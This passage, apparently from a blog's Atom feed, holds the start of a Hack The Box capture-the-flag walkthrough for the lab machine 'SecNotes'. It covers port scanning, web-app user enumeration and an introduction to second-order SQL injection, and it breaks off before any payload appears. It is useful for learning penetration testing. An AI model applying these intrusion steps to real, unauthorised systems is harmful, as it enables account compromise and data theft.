&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0c7dahOTYiAfhT63Zzu045qB9oKE8ncDOex8UA_IfYrf-rEC8kaUiqOgC1kZjz8TrZ7ksZOi9d06yxiXBQJMBgmmTgFnJAg1gj-b65qQ1ZhQWbsTuoCQ01OxD6-unsSxMCmoxi5C-Q7eJ/s1600/screenshot.45.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0c7dahOTYiAfhT63Zzu045qB9oKE8ncDOex8UA_IfYrf-rEC8kaUiqOgC1kZjz8TrZ7ksZOi9d06yxiXBQJMBgmmTgFnJAg1gj-b65qQ1ZhQWbsTuoCQ01OxD6-unsSxMCmoxi5C-Q7eJ/s1600/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/7184651924679252932'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/7184651924679252932'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2019/07/bastion.html' title='Bastion'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmQ5mgMgMEhENTG9bVnYdz63C_o3vxHCijpLxZc_Sarc1xdkF41t0cJFgUl5jq173y_csJkd-OqCkyF5FjnPjFnWQqdfPlVh0vlGshKQ-IlS1SmVBZjPQxCmTfC2CI_c5MMsTF7xSejqH/s72-c/screenshot.50.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-6286439826555516368</id><published>2019-07-31T13:52:00.000-05:00</published><updated>2019-08-20T11:32:47.558-05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>SecNotes</title><content type='html'>&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;SECNOTES&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxsxZydf6mjIDuiODu54EZutXZQaGy0ELGKWAb6QQ5NFcbT708EHeujKULcnyJ6Zm9muZfpItWt55pdKW7RJTt7vfApyGqV4AU2424duAVDrAUjmwaaOe9qcvw0qAFgBXWgUfkHuAdp15L/s1600/screenshot.51.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxsxZydf6mjIDuiODu54EZutXZQaGy0ELGKWAb6QQ5NFcbT708EHeujKULcnyJ6Zm9muZfpItWt55pdKW7RJTt7vfApyGqV4AU2424duAVDrAUjmwaaOe9qcvw0qAFgBXWgUfkHuAdp15L/s1600/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- The goal for this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;SecNotes&lt;/b&gt; from the Hack The Box pentesting platform:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://www.hackthebox.eu/&quot;&gt;https://www.hackthebox.eu/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- &lt;b&gt;SecNotes&lt;/b&gt;&#39; IP is 10.10.10.97:&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZAqqXlRs1dDWWPu2d68-Wnt6P5CPmWkCAHN0tuiSPwnnj0RmEw7Rzsi0LcxEKcDiDFEKk2MuZetMxOS7FC-goduJ6hbsevLOkGKUHWGzXaQbtXjbjC7C23s1mpPagoS8IqZ1oB9ijf_2K/s1600/screenshot.2.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZAqqXlRs1dDWWPu2d68-Wnt6P5CPmWkCAHN0tuiSPwnnj0RmEw7Rzsi0LcxEKcDiDFEKk2MuZetMxOS7FC-goduJ6hbsevLOkGKUHWGzXaQbtXjbjC7C23s1mpPagoS8IqZ1oB9ijf_2K/s400/screenshot.2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;- Scanning with Nmap:&lt;/span&gt;&lt;br /&gt;

&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2S2Xakk7_U7pcLUopnRpDu6nGJHVvFXE-MwuB06RADbVi0se3_m-XH8GRODeXzbCJ-7FCnoDdgNq_KNkqa55suFroybqm4y-3ZGnbq867nN_7FlHia2DtEFShai_x978gEuh0s0MbrIbK/s1600/screenshot.3.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2S2Xakk7_U7pcLUopnRpDu6nGJHVvFXE-MwuB06RADbVi0se3_m-XH8GRODeXzbCJ-7FCnoDdgNq_KNkqa55suFroybqm4y-3ZGnbq867nN_7FlHia2DtEFShai_x978gEuh0s0MbrIbK/s1600/screenshot.3.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpDSdyvtVMuTTU73-7XPsU9zZZZZ2At1IGPDNXfHX6mEWgIxn4t0lhLQKndyx0fLG9XF92Co9PtahqS1c5kCPBYaTtLPf7p9g2ixzBOiuIf9L_0SGSjqB7ZRCqnL66Kcwt0rYVQ3FUyXt8/s1600/screenshot.10.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpDSdyvtVMuTTU73-7XPsU9zZZZZ2At1IGPDNXfHX6mEWgIxn4t0lhLQKndyx0fLG9XF92Co9PtahqS1c5kCPBYaTtLPf7p9g2ixzBOiuIf9L_0SGSjqB7ZRCqnL66Kcwt0rYVQ3FUyXt8/s1600/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Browsing the web server on port 80:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Tw1ch8hXD_yYGFb_0M2gbt0KVhRDqxi7skiIxvCGq8oiEbA3LAVtzgaOMbBOIN0TA4mmEC0J_N8vgdzSyCV4Yjo0ERVzVcyay5-pCRtbZH8uLT1wVjDKmaFTC5M8Sgltr4nAm7PO-tH-/s1600/screenshot.4.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Tw1ch8hXD_yYGFb_0M2gbt0KVhRDqxi7skiIxvCGq8oiEbA3LAVtzgaOMbBOIN0TA4mmEC0J_N8vgdzSyCV4Yjo0ERVzVcyay5-pCRtbZH8uLT1wVjDKmaFTC5M8Sgltr4nAm7PO-tH-/s1600/screenshot.4.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;- Registering a new user &lt;b&gt;whitelist&lt;/b&gt;:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRxVwQPgDCXf8oifAaKX1heGCQxEuxCKX_ejgyE7p-0G904siy6fPqAwJAA8EqlOMuFpBlNm_KCcznW7XcJCGVIH5V7IsDpQxQzQrWB_QhRTb2JkLV6SesJKhbpZGk1z9ODjKQNiiucZ9e/s1600/screenshot.5.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRxVwQPgDCXf8oifAaKX1heGCQxEuxCKX_ejgyE7p-0G904siy6fPqAwJAA8EqlOMuFpBlNm_KCcznW7XcJCGVIH5V7IsDpQxQzQrWB_QhRTb2JkLV6SesJKhbpZGk1z9ODjKQNiiucZ9e/s1600/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Login as the new user &lt;b&gt;whitelist&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHupzwNgc0vazVQRa5NO0WpKeV1yV7hZ4PfyX47UiTCmDQo0O6fXP-UlmTitmq0p3QR8SbqtDDYZW2uRZ90HktqEGGyL1uhWIhAUoyrPkHVwCx8w_ZTqrtW04zQ9aOvPM-_If-mB1sosD1/s1600/screenshot.6.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHupzwNgc0vazVQRa5NO0WpKeV1yV7hZ4PfyX47UiTCmDQo0O6fXP-UlmTitmq0p3QR8SbqtDDYZW2uRZ90HktqEGGyL1uhWIhAUoyrPkHVwCx8w_ZTqrtW04zQ9aOvPM-_If-mB1sosD1/s1600/screenshot.6.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;Secure Notes&lt;/b&gt; is a notepad application that stores notes and to-do list with secure password protection using AES encryption and providing quick and easy access using a simple password:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9NpkZAtWtsdeUTD-MZdRIce7Y1NoFRPY2QMnBW3bAokp28rOXYK_FsZ7twpjej6uT-Nywv7Zhyphenhyphenhz6eadNeEX-tbUxp-A0WlVj7LHPahO7tHpZSaj77fTLn2eMsU5Uwkneh0izz_wV1wDI/s1600/screenshot.7.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9NpkZAtWtsdeUTD-MZdRIce7Y1NoFRPY2QMnBW3bAokp28rOXYK_FsZ7twpjej6uT-Nywv7Zhyphenhyphenhz6eadNeEX-tbUxp-A0WlVj7LHPahO7tHpZSaj77fTLn2eMsU5Uwkneh0izz_wV1wDI/s1600/screenshot.7.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The email &lt;b&gt;tyler@secnotes.htb&lt;/b&gt;&amp;nbsp;informs about two details:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;user named &lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;tyler&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;domain &lt;b&gt;secnotes.htb&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
- Also, it is interesting the &lt;b&gt;.php&lt;/b&gt; extension at the login page, revealing PHP is run by the server.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Confirming the existence of user &lt;b&gt;tyler&lt;/b&gt; with a random password:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhda6shvFh_TxgcmSkHZCgNRElwG-sxW9CLrV40FEuiLLp75mC7zkyDj6OU6sLF_mqa5F4H5_mBBDdq2dEbnUCzEDVyt05fwV5Lul3z8xVJnJ_jg0jZUE48-gUoMiIF6X4VXN3YEU9BOHs4/s1600/screenshot.8.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhda6shvFh_TxgcmSkHZCgNRElwG-sxW9CLrV40FEuiLLp75mC7zkyDj6OU6sLF_mqa5F4H5_mBBDdq2dEbnUCzEDVyt05fwV5Lul3z8xVJnJ_jg0jZUE48-gUoMiIF6X4VXN3YEU9BOHs4/s1600/screenshot.8.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCPLETWTHo4o10Ixmx306jVoYGJ_elpqWFQsUhc6az13JpSKO1bOjY35v7XI52lBsgnKed-ui-f3qPIu-zI0xSn5EIFSFjHWFZZmHo0k3xqYVfpK7wp0ulbyWvRRByIIT-8vEdlgsoJbOe/s1600/screenshot.9.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCPLETWTHo4o10Ixmx306jVoYGJ_elpqWFQsUhc6az13JpSKO1bOjY35v7XI52lBsgnKed-ui-f3qPIu-zI0xSn5EIFSFjHWFZZmHo0k3xqYVfpK7wp0ulbyWvRRByIIT-8vEdlgsoJbOe/s1600/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Browsing the other web server at port 8808:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQYvDLd_ovr98pgQPJFdaeS3uHTY0r6-HmwCH951uVhAUOSNZzz_G2E7v-yL43l4poK5_cF0lWzkPeLckHDPinqWX2ug05j3wUKcnmVV3KWxvnqp05ubQ2IEeE_LaKih4qbV00-4K7KQQL/s1600/screenshot.11.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQYvDLd_ovr98pgQPJFdaeS3uHTY0r6-HmwCH951uVhAUOSNZzz_G2E7v-yL43l4poK5_cF0lWzkPeLckHDPinqWX2ug05j3wUKcnmVV3KWxvnqp05ubQ2IEeE_LaKih4qbV00-4K7KQQL/s1600/screenshot.11.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Viewing the source we find the image &lt;b&gt;iisstart.png&lt;/b&gt;:&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGwXMTeCsUzr79GfjHRiS0q5KO-xFsda_023yA4wFeG_LzpUUWWobL8Q06LBTJP3ubkgGpQ8h2g_7TEtBG-hP3l-hXSpXHbVlHKqV3pRRP6t1oTfjO8becD94rDZ8nPhJdDIk1qtK_FmOg/s1600/screenshot.20.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGwXMTeCsUzr79GfjHRiS0q5KO-xFsda_023yA4wFeG_LzpUUWWobL8Q06LBTJP3ubkgGpQ8h2g_7TEtBG-hP3l-hXSpXHbVlHKqV3pRRP6t1oTfjO8becD94rDZ8nPhJdDIk1qtK_FmOg/s1600/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;3.1 - SQL injection&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;- &lt;b&gt;&quot;Second order&quot; SQL injection&lt;/b&gt; attack delays execution until a secondary query, by injecting a query fragment into a query (that’s not necessarily vulnerable to injection), and then have that injected SQL execute in a second query that is vulnerable to SQL injection.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://portswigger.net/kb/issues/00100210_sql-injection-second-order&quot;&gt;https://portswigger.net/kb/issues/00100210_sql-injection-second-order&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
